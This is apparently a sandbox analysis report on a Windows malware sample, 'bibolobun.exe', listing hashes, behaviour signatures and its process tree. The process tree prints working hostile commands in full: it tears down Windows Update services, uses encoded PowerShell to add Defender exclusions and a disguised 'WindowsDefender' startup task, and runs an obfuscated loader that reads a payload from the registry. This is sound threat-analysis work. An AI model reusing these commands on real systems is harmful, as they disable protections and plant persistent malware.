Analysis
-
max time kernel
31s -
max time network
72s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
30-08-2022 08:07
Static task
static1
Behavioral task
behavioral1
Sample
bibolobun.exe
Resource
win7-20220812-en
General
-
Target
bibolobun.exe
-
Size
5.1MB
-
MD5
2438b851e157a3f70bd48af1984b2139
-
SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5
-
SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
-
SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
SSDEEP
98304:hoJgPPz4jnKiw6qbse0KZ3U/TUpm9OMtUdvHW4i/6jUH2+9Nx40u:onKl6qgeUoSOdPZi/GUH2QX40u
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Drops file in Drivers directory 1 IoCs
Processes:
conhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 5112 takeown.exe 2936 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 5112 takeown.exe 2936 icacls.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1040 sc.exe 1216 sc.exe 4212 sc.exe 1244 sc.exe 1120 sc.exe -
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 748 reg.exe 4640 reg.exe 1012 reg.exe 2260 reg.exe 4880 reg.exe 2356 reg.exe 8 reg.exe 1880 reg.exe 4176 reg.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 3488 powershell.exe 3488 powershell.exe 2440 powershell.exe 2440 powershell.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exetakeown.exedescription pid process Token: SeDebugPrivilege 3488 powershell.exe Token: SeShutdownPrivilege 988 powercfg.exe Token: SeCreatePagefilePrivilege 988 powercfg.exe Token: SeShutdownPrivilege 224 powercfg.exe Token: SeCreatePagefilePrivilege 224 powercfg.exe Token: SeShutdownPrivilege 1336 powercfg.exe Token: SeCreatePagefilePrivilege 1336 powercfg.exe Token: SeShutdownPrivilege 4976 powercfg.exe Token: SeCreatePagefilePrivilege 4976 powercfg.exe Token: SeDebugPrivilege 2440 powershell.exe Token: SeTakeOwnershipPrivilege 5112 takeown.exe -
Suspicious use of WriteProcessMemory 41 IoCs
Processes:
bibolobun.execonhost.execmd.execmd.exedescription pid process target process PID 4964 wrote to memory of 4580 4964 bibolobun.exe conhost.exe PID 4964 wrote to memory of 4580 4964 bibolobun.exe conhost.exe PID 4964 wrote to memory of 4580 4964 bibolobun.exe conhost.exe PID 4580 wrote to memory of 3488 4580 conhost.exe powershell.exe PID 4580 wrote to memory of 3488 4580 conhost.exe powershell.exe PID 4580 wrote to memory of 3900 4580 conhost.exe cmd.exe PID 4580 wrote to memory of 3900 4580 conhost.exe cmd.exe PID 4580 wrote to memory of 4124 4580 conhost.exe cmd.exe PID 4580 wrote to memory of 4124 4580 conhost.exe cmd.exe PID 3900 wrote to memory of 1040 3900 cmd.exe sc.exe PID 3900 wrote to memory of 1040 3900 cmd.exe sc.exe PID 3900 wrote to memory of 1216 3900 cmd.exe sc.exe PID 3900 wrote to memory of 1216 3900 cmd.exe sc.exe PID 4124 wrote to memory of 988 4124 cmd.exe powercfg.exe PID 4124 wrote to memory of 988 4124 cmd.exe powercfg.exe PID 4124 wrote to memory of 224 4124 cmd.exe powercfg.exe PID 4124 wrote to memory of 224 4124 cmd.exe powercfg.exe PID 3900 wrote to memory of 4212 3900 cmd.exe sc.exe PID 3900 wrote to memory of 4212 3900 cmd.exe sc.exe PID 4124 wrote to memory of 1336 4124 cmd.exe powercfg.exe PID 4124 wrote to memory of 1336 4124 cmd.exe powercfg.exe PID 4580 wrote to memory of 2440 4580 conhost.exe powershell.exe PID 4580 wrote to memory of 2440 4580 conhost.exe powershell.exe PID 4124 wrote to memory of 4976 4124 cmd.exe powercfg.exe PID 4124 wrote to memory of 4976 4124 cmd.exe powercfg.exe PID 3900 wrote to memory of 1244 3900 cmd.exe sc.exe PID 3900 wrote to memory of 1244 3900 cmd.exe sc.exe PID 3900 wrote to memory of 1120 3900 cmd.exe sc.exe PID 3900 wrote to memory of 1120 3900 cmd.exe sc.exe PID 3900 wrote to memory of 748 3900 cmd.exe reg.exe PID 3900 wrote to memory of 748 3900 cmd.exe reg.exe PID 3900 wrote to memory of 4640 3900 cmd.exe reg.exe PID 3900 wrote to memory of 4640 3900 cmd.exe reg.exe PID 3900 wrote to memory of 8 3900 cmd.exe reg.exe PID 3900 wrote to memory of 8 3900 cmd.exe reg.exe PID 3900 wrote to memory of 1880 3900 cmd.exe reg.exe PID 3900 wrote to memory of 1880 3900 cmd.exe reg.exe PID 3900 wrote to memory of 4176 3900 cmd.exe reg.exe PID 3900 wrote to memory of 4176 3900 cmd.exe reg.exe PID 3900 wrote to memory of 5112 3900 cmd.exe takeown.exe PID 3900 wrote to memory of 5112 3900 cmd.exe takeown.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"2⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQBiACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFAAbABhAHQAZgBvAHIAbQBcAEQAZQBmAGUAbgBkAGUAcgBcAHUAcABkAGEAdABlAC4AZQB4AGUAIgAnACkAIAA8ACMAZgBwACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYwBlAGkAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AbAB5AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdwB0AHMAaAAjAD4AOwA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"3⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "WindowsDefender"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Program Files\Platform\Defender\update.exe"C:\Program Files\Platform\Defender\update.exe"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6ab240f6-be2f-4a8e-ac90-75b88bd58102}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Platform\Defender\update.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Program Files\Platform\Defender\update.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5440cb38dbee06645cc8b74d51f6e5f71
SHA1d7e61da91dc4502e9ae83281b88c1e48584edb7c
SHA2568ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe
SHA5123aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5be9965796e35a7999ce50af07f73b631
SHA1dde100f3f5a51fa399755fefd49da003d887742a
SHA2566ea6a56f5d5ec6f60b5a748840eed28859f792db2e37f4c1c419e3a92fc619b3
SHA51245369246c8f6e80fa7a3c34db98922702e5f10e67348c94bb27f5bb241ad72cecd72ff5843a2c6b47cec390a6b9c97ba3c4d4244c62b8119ce1b2ca0c3dc3e37
-
\Users\Admin\AppData\Roaming\D2B6.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/8-154-0x0000000000000000-mapping.dmp
-
memory/224-143-0x0000000000000000-mapping.dmp
-
memory/400-169-0x0000000000000000-mapping.dmp
-
memory/508-164-0x0000000000000000-mapping.dmp
-
memory/672-197-0x00007FFD1B230000-0x00007FFD1B240000-memory.dmpFilesize
64KB
-
memory/748-151-0x0000000000000000-mapping.dmp
-
memory/836-165-0x0000000000000000-mapping.dmp
-
memory/988-142-0x0000000000000000-mapping.dmp
-
memory/1012-166-0x0000000000000000-mapping.dmp
-
memory/1040-140-0x0000000000000000-mapping.dmp
-
memory/1120-150-0x0000000000000000-mapping.dmp
-
memory/1216-141-0x0000000000000000-mapping.dmp
-
memory/1244-148-0x0000000000000000-mapping.dmp
-
memory/1336-145-0x0000000000000000-mapping.dmp
-
memory/1340-181-0x0000000000000000-mapping.dmp
-
memory/1504-192-0x00007FFD59200000-0x00007FFD592BE000-memory.dmpFilesize
760KB
-
memory/1504-188-0x00000001400033F4-mapping.dmp
-
memory/1504-190-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1504-191-0x00007FFD5B1B0000-0x00007FFD5B3A5000-memory.dmpFilesize
2.0MB
-
memory/1504-187-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1504-189-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1880-156-0x0000000000000000-mapping.dmp
-
memory/1888-176-0x0000000000000000-mapping.dmp
-
memory/2260-168-0x0000000000000000-mapping.dmp
-
memory/2356-174-0x0000000000000000-mapping.dmp
-
memory/2440-155-0x00007FFD3C5D0000-0x00007FFD3D091000-memory.dmpFilesize
10.8MB
-
memory/2440-160-0x00007FFD3C5D0000-0x00007FFD3D091000-memory.dmpFilesize
10.8MB
-
memory/2440-146-0x0000000000000000-mapping.dmp
-
memory/2708-194-0x00007FFD59200000-0x00007FFD592BE000-memory.dmpFilesize
760KB
-
memory/2708-193-0x00007FFD5B1B0000-0x00007FFD5B3A5000-memory.dmpFilesize
2.0MB
-
memory/2708-185-0x00007FFD59200000-0x00007FFD592BE000-memory.dmpFilesize
760KB
-
memory/2708-184-0x00007FFD3D010000-0x00007FFD3DAD1000-memory.dmpFilesize
10.8MB
-
memory/2708-183-0x00007FFD5B1B0000-0x00007FFD5B3A5000-memory.dmpFilesize
2.0MB
-
memory/2708-195-0x00007FFD3D010000-0x00007FFD3DAD1000-memory.dmpFilesize
10.8MB
-
memory/2936-159-0x0000000000000000-mapping.dmp
-
memory/3488-135-0x000001D00F7B0000-0x000001D00F7D2000-memory.dmpFilesize
136KB
-
memory/3488-134-0x0000000000000000-mapping.dmp
-
memory/3488-137-0x00007FFD3C5D0000-0x00007FFD3D091000-memory.dmpFilesize
10.8MB
-
memory/3488-136-0x00007FFD3C5D0000-0x00007FFD3D091000-memory.dmpFilesize
10.8MB
-
memory/3900-138-0x0000000000000000-mapping.dmp
-
memory/3944-179-0x0000000000000000-mapping.dmp
-
memory/3976-180-0x0000000000000000-mapping.dmp
-
memory/4116-178-0x0000000000000000-mapping.dmp
-
memory/4124-139-0x0000000000000000-mapping.dmp
-
memory/4176-157-0x0000000000000000-mapping.dmp
-
memory/4212-144-0x0000000000000000-mapping.dmp
-
memory/4580-170-0x00007FFD3C5D0000-0x00007FFD3D091000-memory.dmpFilesize
10.8MB
-
memory/4580-133-0x00007FFD3C5D0000-0x00007FFD3D091000-memory.dmpFilesize
10.8MB
-
memory/4580-132-0x000001D671140000-0x000001D671612000-memory.dmpFilesize
4.8MB
-
memory/4580-161-0x000001D6742C0000-0x000001D6742D2000-memory.dmpFilesize
72KB
-
memory/4604-167-0x0000000000000000-mapping.dmp
-
memory/4624-182-0x00000000039C0000-0x00000000039F6000-memory.dmpFilesize
216KB
-
memory/4624-186-0x0000000004140000-0x0000000004768000-memory.dmpFilesize
6.2MB
-
memory/4640-152-0x0000000000000000-mapping.dmp
-
memory/4740-175-0x0000000000000000-mapping.dmp
-
memory/4880-171-0x0000000000000000-mapping.dmp
-
memory/4888-163-0x00007FF7E4E61844-mapping.dmp
-
memory/4956-177-0x0000000000000000-mapping.dmp
-
memory/4976-147-0x0000000000000000-mapping.dmp
-
memory/5112-158-0x0000000000000000-mapping.dmp